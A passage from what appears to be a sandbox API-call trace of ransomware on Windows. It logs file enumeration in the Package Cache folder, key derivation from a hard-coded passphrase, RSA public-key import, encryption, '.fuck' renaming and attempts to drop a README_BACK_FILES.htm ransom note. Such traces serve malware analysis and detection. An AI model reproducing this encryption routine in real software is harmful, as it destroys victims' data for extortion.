lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.012] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.013] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2846460 [0238.013] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.013] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.013] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2845ea0 [0238.014] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.014] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.014] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.014] GetLastError () returned 0x0 [0238.014] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0238.014] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.015] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.015] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.015] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.015] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2859bf0) returned 1 [0238.018] CryptCreateHash (in: hProv=0x2859bf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.018] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.018] CryptHashData (hHash=0x28467e0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.018] CryptDeriveKey (in: hProv=0x2859bf0, Algid=0x6610, hBaseData=0x28467e0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28469e0) returned 1 [0238.018] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.018] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.018] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2859d00) returned 1 [0238.018] CryptImportPublicKeyInfo (in: hCryptProv=0x2859d00, dwCertEncodingType=0x1, pInfo=0x2868dd8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2868e08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2868e10*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2846ba0) returned 1 [0238.018] CryptEncrypt (in: hKey=0x2846ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.018] CryptEncrypt (in: hKey=0x2846ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859e98*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2859e98*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.019] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2859e98, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.019] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.019] CryptEncrypt (in: hKey=0x28469e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.019] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.019] CloseHandle (hObject=0xffffffff) returned 1 [0238.019] CloseHandle (hObject=0xffffffff) returned 1 [0238.019] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0238.019] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.019] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg")) returned 0 [0238.020] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.fuck")) returned 0 [0238.020] CryptDestroyHash (hHash=0x28467e0) returned 1 [0238.020] CryptDestroyKey (hKey=0x28469e0) returned 1 [0238.020] CryptReleaseContext (hProv=0x2859bf0, dwFlags=0x0) returned 1 [0238.020] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.020] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.020] GetLastError () returned 0x5 [0238.020] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0238.021] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x80) returned 0 [0238.021] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.021] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.022] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.022] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2858160) returned 1 [0238.024] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.024] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.024] CryptHashData (hHash=0x2846c60, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.024] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2846c60, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28467e0) returned 1 [0238.024] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.024] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.024] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28591d8) returned 1 [0238.024] CryptImportPublicKeyInfo (in: hCryptProv=0x28591d8, dwCertEncodingType=0x1, pInfo=0x2869048*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869078*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869080*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817458) returned 1 [0238.024] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.024] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859f20*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2859f20*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.024] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2859f20, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.025] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.025] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.025] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.025] CloseHandle (hObject=0xffffffff) returned 1 [0238.025] CloseHandle (hObject=0xffffffff) returned 1 [0238.025] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), bFailIfExists=0) returned 0 [0238.025] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", dwFileAttributes=0x0) returned 0 [0238.025] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.gsg")) returned 0 [0238.025] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.fuck" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.fuck")) returned 0 [0238.026] CryptDestroyHash (hHash=0x2846c60) returned 1 [0238.026] CryptDestroyKey (hKey=0x28467e0) returned 1 [0238.026] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0238.026] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.026] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0238.026] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\readme_back_files.htm")) returned 0xffffffff [0238.026] AreFileApisANSI () returned 1 [0238.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2852670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 132 [0238.027] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.027] GetLastError () returned 0x5 [0238.027] GetLastError () returned 0x5 [0238.027] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.027] FindClose (in: hFindFile=0x2846460 | out: hFindFile=0x2846460) returned 1 [0238.027] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.027] AreFileApisANSI () returned 1 [0238.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.027] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.028] GetLastError () returned 0x5 [0238.028] GetLastError () returned 0x5 [0238.028] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.028] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0238.028] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\readme_back_files.htm")) returned 0xffffffff [0238.028] AreFileApisANSI () returned 1 [0238.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.028] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.028] GetLastError () returned 0x5 [0238.028] GetLastError () returned 0x5 [0238.028] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.028] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2817298 [0238.029] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.029] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.029] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.029] GetLastError () returned 0x5 [0238.029] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm")) returned 0x20 [0238.029] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", dwFileAttributes=0x80) returned 0 [0238.029] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.029] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.029] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0238.030] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0238.032] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.032] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.032] CryptHashData (hHash=0x2816f58, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.032] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x2816f58, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2817858) returned 1 [0238.032] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.032] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.032] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28598c0) returned 1 [0238.032] CryptImportPublicKeyInfo (in: hCryptProv=0x28598c0, dwCertEncodingType=0x1, pInfo=0x2869798*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28697c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28697d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2846460) returned 1 [0238.032] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.032] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859bf0*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: 